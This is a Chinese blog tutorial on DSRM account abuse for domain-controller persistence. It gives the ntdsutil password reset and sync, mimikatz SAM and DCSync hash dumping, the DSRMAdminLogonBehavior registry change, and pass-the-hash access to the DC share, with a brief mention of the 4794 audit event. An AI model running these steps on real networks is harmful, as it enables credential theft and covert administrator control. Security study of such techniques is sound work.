【域权限维持】-DSRM Abuse

最新推荐文章于 2024-07-24 11:17:31 发布
最新推荐文章于 2024-07-24 11:17:31 发布
阅读量164 收藏
点赞数
分类专栏: 域安全-权限维持 文章标签: windows 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617902/article/details/128742590
版权

目录服务还原模式账户滥用

DSRM账户密码是安装DC的时候设置的,一般不会修改,该账户是域控的本地管理员账户,并非域的管理员帐户,存储在SAM文件中,所以DSRM密码同步之后并不会影响域的管理员帐户,另外,在下一次进行DSRM密码同步之前,NTLM Hash的值一直有效,且更改域内的administrator帐户,并不会影响DSRM帐户,持久化效果很好

1、首次配置DSRM是在安装域控制器时

在这里插入图片描述

2、使用ntdsutil重置DSRM账户的密码[域控上执行,建议直接用管理员权限的cmd]

ntdsutil
set dsrm password
#此处的null代表本机,其它机器需输入对应机器名
reset password on server null
连续输入两次新密码即可

在这里插入图片描述

3、读取域控制器上的SAM文件保存的hash

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

在这里插入图片描述

读取域控制器上域administrator用户的hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:byjb.com /user:administrator /csv" exit

在这里插入图片描述

4、新建注册表使DSRM账户可远程登录域控

要使用DSRM账户登录域控制器需满足以下注册表键值为2(该注册表键值默认不存在)需要有注册表键:HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
该键值的类型的DWORD,共有以下几个选择
0:默认值,只有当域控制器重启并进入DSRM模式时,才可以使用DSRM管理员账号。
1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器。
2:在任何情况下,都可以使用DSRM管理员账号登录域控制器。

在这里插入图片描述

5、域内成员机器使用mimikatz pth横向移动到域控,需先使用klist purge清理票据(避免受到干扰) 该命令会自动弹出一个cmd用于访问目标

mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:dc01 /user:administrator /ntlm:****"
dir /a \\dc01\c$

未配置注册表值为2时,显示用户名或密码不正确
在这里插入图片描述

配置成功后

在这里插入图片描述

6、修改DSRM的另一个方式,直接同步其他域账户的hash

ntdsutil
set dsrm password
sync from domain account admin

在这里插入图片描述

同步的hash是相同的
在这里插入图片描述

7、日志信息

Windows Event 4794
在这里插入图片描述

8、 操作注册表注册表的方式有很多,可以借助cmd,wmic,powershell等程序

注:此文章参考了很多的网络上的其他文章!!!

Getuid
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限维持:DSRM 权限维持
f_carey的博客
12-18 3779
权限维持1 修改 DSRM 密码2 DSRM 后门操作过程3 DSRM 后门防御 目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器控制器的安全模式启动选项。每个控制器都有一个本地管理员账户 (也就是DSRM账户)。 DSRM用途:允许管理员在环境中出现故障或崩溃时还原、修复、重建活动目录数据库,使环境的运行恢复正常。在环境创建初期,DSRM 的密码需要在安装 DC 时设置,且很少会被重置。修改 DSRM 密码最基本的方法
渗透|权限维持之DSRM
weixin_42282189的博客
09-04 433
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 DSRM(Directory Services Restore Mode,目录服务恢复模式)是Windows环境中控制器的安全模式启动选项,但是只允许在控制台登陆,可以通过修改注册表的方式,来通过网络验证登陆到DC服务器上。 在每个控制器都有一个本地管理员账户——也是DSRM账户,DSRM主要作用是使出现故障或崩溃的环境恢复正常运行,修改DSRM密码的最基本方法是在DC上运行ntdsut.
利用DSRM账号进行权限维持
热门推荐
Shanfenglan's blog
11-26 6万+
CATALOG1.前言2.原理3.实现3.1 更改DSRM明文密码3.2 利用内其他用户的hash去同步DSRM的密码4.防御方法参考文章 1.前言 今天看了内网加固方面的知识,发现了一个加固方案是针对DSRM攻击的,于是就查了一下么是DSRM攻击,因此有了这篇文章。 2.原理 控上有个账户,名字为目录服务还原模式账户又名DSRM账户,它的密码是安装DC的时候设置的,一般不会修改。但是当DSRM账户被修改的时候,控的本地管理员administrator账户密码的hash也会被修改,并且与DSRM账户
权限维持之创建DSRM后门
good good study
03-02 690
DSRM 账号可以作为一个控制器的本地管理员用户,可通过网络连接控制器,进而控制控。如果要使用 DSRM 账号通过网络登录控制器,需通过注册表将该值设置为 2,从而允许DSRM账号在任何情况下都可以登录控制器。DSRM(目录服务还原模式),在初期安装控的时候会让我们设置DSRM的管理员密码,这个密码是为了在后期控发生问题时修复、还原或重建活动目录。0:默认值,只有当控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号。此时,红队人员可以通过DSRM账户对控制器进行控制了。
AD环境搭建超详细
w1304099880的博客
03-08 2万+
AD环境搭建1/2工具环境介绍Windows Server 2012 的配置 文章太长分两篇写了 工具 Vmware、Windows10 环境介绍 Windows Server2012 名服务器:ceshi.com 账号:Administrator;pcuser(两个账号) 密码:wang123456.. IP地址:192.168.10.100 Win7Sp1 账号:userone 密码:Wang123456.. IP地址:192.168.10.101 两者为仅主机模式(192.168
权限维持-DSRM
whojoe的博客
05-17 518
权限维持-DSRM简介更改DSRM密码的方式通过明文指定通过账户同步DSRM利用使用DSRM账户连接的前提使用psexec或者wmiexec进行链接参考文章 简介 除了krbtgt服务帐号外,控上还有个可利用的账户:目录服务还原模式(DSRM)账户,这个密码是在DC安装的时候设置的,所以一般不会被修改。但是微软对DSRM帐号进行了限制,只允许在控制台登录。可以通过修改注册表的方式,将如下注册表键值: HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdmin
权限维持方法浅析.pdf
08-08
Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security Support Provider (SSP) Hook PasswordChangeNotify Skeleton Key DCShadow BadGPO(Group Policy Objects) ACL (Access ...
权限维持方法技术解析.pdf
10-19
在IT领,特别是网络安全方面,了解权限维持方法至关重要,因为这关系到组织的数据安全和系统完整性。本文将深入解析几种关键的技术手段,包括Golden Ticket、Silver Ticket、SID历史、Directory Service Restore...
权限维持方法技术解析.pptx
10-19
在IT领,特别是网络安全和系统管理中,"权限维持方法技术解析"是一个重要的主题,涉及到如何保护和管理企业网络中的Active Directory环境。Active Directory(AD)是Microsoft Windows网络操作系统的核心组件,...
如何查找并删除中多余的计算机帐号?.doc
09-30
在IT管理领,尤其是涉及到大型企业或组织的网络环境,控制器(Domain Controller)...同时,定期进行这样的清理工作是维持管理高效的重要环节。在进行此类操作时,务必遵循最佳实践,以避免对正常业务产生影响。
管理必会的东西
05-10
管理】是企业网络环境中不可或缺的一部分,它主要用于集中管理和控制网络中的计算机、用户账户以及安全策略。在大型的企业控环境中,管理员密码是非常关键的,因为它们用于执行诸如恢复目录服务、维护全局...
【入门基础】java泛型和通配符详解
杰叔叔不是个好叔叔的博客
07-19 772
Java泛型(Generics)是JDK 5中引入的一个新特性,它提供了编译时类型安全检测机制,允许程序员在编译时检测到非法的类型。泛型的主要目的是在编译期间对类型进行检查,使得类型错误能在编译时而不是运行时被捕获,从而提高程序的稳定性和安全性。同时,它也消除了类型转换的代码,使得代码更加简洁和易于维护。需要注意的是,上述非主流用法并非推荐的做法,它们可能增加代码的复杂性和出错的风险。在大多数情况下,应优先考虑使用泛型和通配符的主流用法来编写清晰、简洁、易于维护的代码。
Python list comprehension (列表推导式 - 列表解析式 - 列表生成式)
既然选择了远方 便只顾风雨兼程 - 永强
07-20 770
Python list comprehension (列表推导式 - 列表解析式 - 列表生成式)
Java在for循环中修改集合
java_t_t的博客
07-21 771
尽量不要在遍历中修改集合本身(修改集合中的元素的属性没问题),除非你能明确知道该操作导致的后果。如果需要在循环中移除元素,可以使用迭代器iterator。
SpringBoot源码(1)ApplicationContext和BeanFactory
weixin_43823462的博客
07-21 840
SpringBoot源码之ApplicationContext和BeanFactory
百日筑基第二十七天-Java8 stream流常用操作
qq_45477639的博客
07-21 846
除了使用Collectors提供了toMap,toList等方法之外,我们还可以自定义Collection的数据结构收集//用LinkedList收集//用TreeSet收集。
c++中的递归拷贝(Recursive Copy)和递归反转链表(Recursive Reverse Linked List)
最新发布
2401_84159494的博客
07-24 872
hello大家好啊,这里是文宇,不是文字,是文宇哦。今日二更结束,睡觉。
python中的fire和Linux shell中的参数传递
Richardlygo的博客
07-20 859
Hi, John!
Java-集合的嵌套
lizhiwei21的博客
07-21 355
Java中的集合可以进行嵌套,也就是说可以在集合中包含其他集合作为元素。这种嵌套可以用于处理更复杂的数据结构或者数据组织需求。简单的示例。
Windows Server 2012 部署控制器指南
"该文档详细介绍了在Windows Server 2022中部署控制器的过程,虽然标题提及Server 2022,但内容实际描述的是Windows Server 2012的步骤。文中提到Windows Server 2012在部署控制器(DC)时相比以往版本有所变化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值